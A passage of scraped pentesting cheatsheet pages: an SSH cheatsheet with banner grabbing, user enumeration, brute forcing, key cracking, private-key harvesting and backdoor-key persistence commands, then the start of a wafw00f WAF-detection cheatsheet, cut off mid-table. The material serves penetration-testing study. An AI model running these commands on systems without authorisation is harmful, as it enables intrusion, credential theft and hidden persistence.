Cheatsheet Default Port: 22 (TCP)\nBanner \u0026amp; Info Gathering nc -nv \u0026lt;ip\u0026gt; 22 # Banner grab ssh -v \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; # Verbose handshake output ssh -V # Local SSH client version # Nmap scripts nmap -p 22 -sV \u0026lt;ip\u0026gt; nmap -p 22 --script ssh-hostkey \u0026lt;ip\u0026gt; nmap -p 22 --script ssh2-enum-algos \u0026lt;ip\u0026gt; nmap -p 22 --script ssh-auth-methods \\ --script-args ssh.user=\u0026lt;user\u0026gt; \u0026lt;ip\u0026gt; nmap -p 22 --script sshv1 \u0026lt;ip\u0026gt; # Check for insecure SSHv1 ssh-audit (Configuration Security Check) ssh-audit \u0026lt;ip\u0026gt; ssh-audit \u0026lt;ip\u0026gt; -p 22 # Flags to note: # [fail] = critical issue # [warn] = should be fixed # Lists: KEX, hostkey, encryption, MAC algorithms User Enumeration # CVE-2018-15473 (OpenSSH \u0026lt; 7.7 username enumeration) python3 ssh_user_enum.py --userList users.txt --ip \u0026lt;ip\u0026gt; # Metasploit use auxiliary/scanner/ssh/ssh_enumusers set RHOSTS \u0026lt;ip\u0026gt; set USER_FILE users.txt run Brute Force # Hydra hydra -l \u0026lt;user\u0026gt; -P wordlist.txt ssh://\u0026lt;ip\u0026gt; hydra -L users.txt -P wordlist.txt ssh://\u0026lt;ip\u0026gt; hydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s 2222 ssh://\u0026lt;ip\u0026gt; # Custom port # Medusa medusa -h \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -P wordlist.txt -M ssh # Nmap nmap -p 22 --script ssh-brute \u0026lt;ip\u0026gt; nmap -p 22 --script ssh-brute \\ --script-args userdb=users.txt,passdb=pass.txt \u0026lt;ip\u0026gt; # Metasploit use auxiliary/scanner/ssh/ssh_login set RHOSTS \u0026lt;ip\u0026gt; set USERNAME \u0026lt;user\u0026gt; set PASS_FILE wordlist.txt run Key-Based Attacks # Connect with private key ssh -i id_rsa \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; chmod 600 id_rsa \u0026amp;\u0026amp; ssh -i id_rsa \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; # Crack passphrase on private key ssh2john id_rsa \u0026gt; ssh_hash.txt john ssh_hash.txt --wordlist=wordlist.txt hashcat -m 22921 ssh_hash.txt wordlist.txt # Ed25519 hashcat -m 22911 ssh_hash.txt wordlist.txt # RSA # Scan for keys (key harvesting after initial access) find / -name \u0026#34;id_rsa\u0026#34; -o -name \u0026#34;id_ecdsa\u0026#34; -o -name \u0026#34;id_ed25519\u0026#34; 2\u0026gt;/dev/null find / -name \u0026#34;*.pem\u0026#34; -o -name \u0026#34;*.key\u0026#34; 2\u0026gt;/dev/null SSH Key Scanning # Collect host keys ssh-keyscan \u0026lt;ip\u0026gt; ssh-keyscan -t rsa,ecdsa,ed25519 \u0026lt;ip\u0026gt; ssh-keyscan -p 2222 \u0026lt;ip\u0026gt; # Scan range ssh-keyscan -f hosts.txt \u0026gt; known_hosts Interesting Files to Grab Post-Access ~/.ssh/id_rsa # Private key ~/.ssh/id_rsa.pub # Public key ~/.ssh/authorized_keys # Authorized keys (add yours for persistence) ~/.ssh/known_hosts # Previous connections (network map) /etc/ssh/sshd_config # Server configuration /etc/ssh/ssh_host_rsa_key # Host private key Add Backdoor SSH Key (Post-Exploitation) # On attacker machine ssh-keygen -t rsa -b 4096 -f backdoor # On target (append to authorized_keys) echo \u0026#34;ssh-rsa AAAA...\u0026#34; \u0026gt;\u0026gt; ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys # Connect back ssh -i backdoor \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; Common Misconfigurations to Check PermitRootLogin yes — Root login allowed PasswordAuthentication yes — Passwords accepted (brutable) PermitEmptyPasswords yes — Blank passwords allowed AuthorizedKeysFile .ssh/authorized_keys — Key auth path AllowUsers / DenyUsers — User restrictions Port 22 — Non-standard port may indicate stealth ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/footprinting/ssh/","summary":"\u003ch1 id=\"ssh-enumeration-cheatsheet\"\u003eSSH Enumeration Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003eDefault Port:\u003c/strong\u003e 22 (TCP)\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"banner--info-gathering\"\u003eBanner \u0026amp; Info Gathering\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enc -nv \u0026lt;ip\u0026gt; \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e \u003cspan style=\"color:#75715e\"\u003e# Banner grab\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh -v \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Verbose handshake output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh -V \u003cspan style=\"color:#75715e\"\u003e# Local SSH client version\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Nmap scripts\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e -sV \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script ssh-hostkey \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script ssh2-enum-algos \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script ssh-auth-methods \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --script-args ssh.user\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003e\u0026lt;user\u0026gt; \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script sshv1 \u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Check for insecure SSHv1\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ssh-audit-configuration-security-check\"\u003essh-audit (Configuration Security Check)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-audit \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-audit \u0026lt;ip\u0026gt; -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Flags to note:\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# [fail] = critical issue\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# [warn] = should be fixed\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Lists: KEX, hostkey, encryption, MAC algorithms\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"user-enumeration\"\u003eUser Enumeration\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# CVE-2018-15473 (OpenSSH \u0026lt; 7.7 username enumeration)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003epython3 ssh_user_enum.py --userList users.txt --ip \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Metasploit\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/ssh/ssh_enumusers\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset USER_FILE users.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"brute-force\"\u003eBrute Force\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Hydra\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt ssh://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -L users.txt -P wordlist.txt ssh://\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehydra -l \u0026lt;user\u0026gt; -P wordlist.txt -s \u003cspan style=\"color:#ae81ff\"\u003e2222\u003c/span\u003e ssh://\u0026lt;ip\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Custom port\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Medusa\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003emedusa -h \u0026lt;ip\u0026gt; -u \u0026lt;user\u0026gt; -P wordlist.txt -M ssh\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Nmap\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script ssh-brute \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003enmap -p \u003cspan style=\"color:#ae81ff\"\u003e22\u003c/span\u003e --script ssh-brute \u003cspan style=\"color:#ae81ff\"\u003e\\\n\u003c/span\u003e\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e --script-args userdb\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003eusers.txt,passdb\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003epass.txt \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Metasploit\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003euse auxiliary/scanner/ssh/ssh_login\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset RHOSTS \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset USERNAME \u0026lt;user\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eset PASS_FILE wordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003erun\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"key-based-attacks\"\u003eKey-Based Attacks\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect with private key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh -i id_rsa \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003echmod \u003cspan style=\"color:#ae81ff\"\u003e600\u003c/span\u003e id_rsa \u003cspan style=\"color:#f92672\"\u003e\u0026amp;\u0026amp;\u003c/span\u003e ssh -i id_rsa \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Crack passphrase on private key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh2john id_rsa \u0026gt; ssh_hash.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ejohn ssh_hash.txt --wordlist\u003cspan style=\"color:#f92672\"\u003e=\u003c/span\u003ewordlist.txt\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehashcat -m \u003cspan style=\"color:#ae81ff\"\u003e22921\u003c/span\u003e ssh_hash.txt wordlist.txt \u003cspan style=\"color:#75715e\"\u003e# Ed25519\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ehashcat -m \u003cspan style=\"color:#ae81ff\"\u003e22911\u003c/span\u003e ssh_hash.txt wordlist.txt \u003cspan style=\"color:#75715e\"\u003e# RSA\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Scan for keys (key harvesting after initial access)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efind / -name \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;id_rsa\u0026#34;\u003c/span\u003e -o -name \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;id_ecdsa\u0026#34;\u003c/span\u003e -o -name \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;id_ed25519\u0026#34;\u003c/span\u003e 2\u0026gt;/dev/null\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003efind / -name \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;*.pem\u0026#34;\u003c/span\u003e -o -name \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;*.key\u0026#34;\u003c/span\u003e 2\u0026gt;/dev/null\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"ssh-key-scanning\"\u003eSSH Key Scanning\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Collect host keys\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-keyscan \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-keyscan -t rsa,ecdsa,ed25519 \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-keyscan -p \u003cspan style=\"color:#ae81ff\"\u003e2222\u003c/span\u003e \u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Scan range\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-keyscan -f hosts.txt \u0026gt; known_hosts\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"interesting-files-to-grab-post-access\"\u003eInteresting Files to Grab Post-Access\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/.ssh/id_rsa \u003cspan style=\"color:#75715e\"\u003e# Private key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/.ssh/id_rsa.pub \u003cspan style=\"color:#75715e\"\u003e# Public key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/.ssh/authorized_keys \u003cspan style=\"color:#75715e\"\u003e# Authorized keys (add yours for persistence)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e~/.ssh/known_hosts \u003cspan style=\"color:#75715e\"\u003e# Previous connections (network map)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/etc/ssh/sshd_config \u003cspan style=\"color:#75715e\"\u003e# Server configuration\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e/etc/ssh/ssh_host_rsa_key \u003cspan style=\"color:#75715e\"\u003e# Host private key\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"add-backdoor-ssh-key-post-exploitation\"\u003eAdd Backdoor SSH Key (Post-Exploitation)\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# On attacker machine\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh-keygen -t rsa -b \u003cspan style=\"color:#ae81ff\"\u003e4096\u003c/span\u003e -f backdoor\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# On target (append to authorized_keys)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003eecho \u003cspan style=\"color:#e6db74\"\u003e\u0026#34;ssh-rsa AAAA...\u0026#34;\u003c/span\u003e \u0026gt;\u0026gt; ~/.ssh/authorized_keys\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003echmod \u003cspan style=\"color:#ae81ff\"\u003e600\u003c/span\u003e ~/.ssh/authorized_keys\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#75715e\"\u003e# Connect back\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003essh -i backdoor \u0026lt;user\u0026gt;@\u0026lt;ip\u0026gt;\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-misconfigurations-to-check\"\u003eCommon Misconfigurations to Check\u003c/h2\u003e\n\u003cpre tabindex=\"0\"\u003e\u003ccode\u003ePermitRootLogin yes — Root login allowed\nPasswordAuthentication yes — Passwords accepted (brutable)\nPermitEmptyPasswords yes — Blank passwords allowed\nAuthorizedKeysFile .ssh/authorized_keys — Key auth path\nAllowUsers / DenyUsers — User restrictions\nPort 22 — Non-standard port may indicate stealth\n\u003c/code\u003e\u003c/pre\u003e","title":"SSH"},{"content":"wafw00f Cheatsheet Purpose: Identify and fingerprint Web Application Firewalls (WAFs) protecting a target web app.\nBasic Usage wafw00f \u0026lt;url\u0026gt; # Scan a single target wafw00f https://example.com # HTTPS target wafw00f example.com -v # Verbose output wafw00f example.com -vv # Extra verbose (debug) Common Flags Flag Description -v / -vv Verbose / very verbose output -a Find ALL WAFs (don\u0026rsquo;t stop at first match) -r Disable HTTP redirect following -t \u0026lt;waf\u0026gt; Test only for a specific WAF -o \u0026lt;file\u0026gt; Write results to file -f \u0026lt;format\u0026gt; Output format: csv, json, text -i \u0026lt;file\u0026gt; Read targets from input file -p \u0026lt;proxy\u0026gt; Use proxy (e.g. http://127.0.0.1:8080) -T \u0026lt;n\u0026gt; Set request timeout (seconds) -H \u0026lt;file\u0026gt; Use custom headers from file -l List all WAFs it can detect --no-colors Disable ANSI colored output Listing \u0026amp; Targeted Detection wafw00f -l # List supported WAFs wafw00f example.com -t \u0026#34;Cloudflare (Cloudflare Inc.)\u0026#34; wafw00f example.com -a # Detect every WAF in chain Bulk Scanning wafw00f -i targets.txt -o results.json -f json wafw00f -i urls.txt -a -o waf-report.csv -f csv Routing Through a Proxy (Burp / ZAP) wafw00f https://target.tld -p http://127.0.0.1:8080 Custom Headers File Example headers.txt:\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) Recon/1.0 X-Forwarded-For: 127.0.0.1 wafw00f example.com -H headers.txt -v Interpreting Results \u0026ldquo;is behind \u0026rdquo; — confident detection via signature. \u0026ldquo;seems to be behind a WAF or some sort of security solution\u0026rdquo; — generic block detected, no fingerprint match. \u0026ldquo;No WAF detected\u0026rdquo; — either no WAF, or WAF is in passive/learning mode. Tips Run -a if a CDN WAF (Cloudflare, Akamai) may be stacked over an origin WAF (ModSecurity, F5). Combine with nikto and whatweb — WAF presence changes how aggressively you should scan. WAF detected ≠ scan blocked. Throttle scans and consider source IP rotation. If results are inconsistent, retry with -r (no redirects) — some WAFs only trigger on the final URL. ","permalink":"https://d3vilsec.com/cheatsheets/pentesting/information-gathering-web-edition/fingerprinting/wafw00f/","summary":"\u003ch1 id=\"wafw00f-cheatsheet\"\u003ewafw00f Cheatsheet\u003c/h1\u003e\n\u003cp\u003e\u003cstrong\u003ePurpose:\u003c/strong\u003e Identify and fingerprint Web Application Firewalls (WAFs) protecting a target web app.\u003c/p\u003e\n\u003chr\u003e\n\u003ch2 id=\"basic-usage\"\u003eBasic Usage\u003c/h2\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;\"\u003e\u003ccode class=\"language-bash\" data-lang=\"bash\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f \u0026lt;url\u0026gt; \u003cspan style=\"color:#75715e\"\u003e# Scan a single target\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f https://example.com \u003cspan style=\"color:#75715e\"\u003e# HTTPS target\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f example.com -v \u003cspan style=\"color:#75715e\"\u003e# Verbose output\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003ewafw00f example.com -vv \u003cspan style=\"color:#75715e\"\u003e# Extra verbose (debug)\u003c/span\u003e\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\u003chr\u003e\n\u003ch2 id=\"common-flags\"\u003eCommon Flags\u003c/h2\u003e\n\u003ctable\u003e\n\t\u003cthead\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003cth\u003eFlag\u003c/th\u003e\n\t\t\t\t\t\u003cth\u003eDescription\u003c/th\u003e\n\t\t\t\u003c/tr\u003e\n\t\u003c/thead\u003e\n\t\u003ctbody\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-v\u003c/code\u003e / \u003ccode\u003e-vv\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eVerbose / very verbose output\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-a\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eFind ALL WAFs (don\u0026rsquo;t stop at first match)\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-r\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eDisable HTTP redirect following\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-t \u0026lt;waf\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eTest only for a specific WAF\u003c/td\u003e\n\t\t\t\u003c/tr\u003e\n\t\t\t\u003ctr\u003e\n\t\t\t\t\t\u003ctd\u003e\u003ccode\u003e-o \u0026lt;file\u0026gt;\u003c/code\u003e\u003c/td\u003e\n\t\t\t\t\t\u003ctd\u003eWrite results to 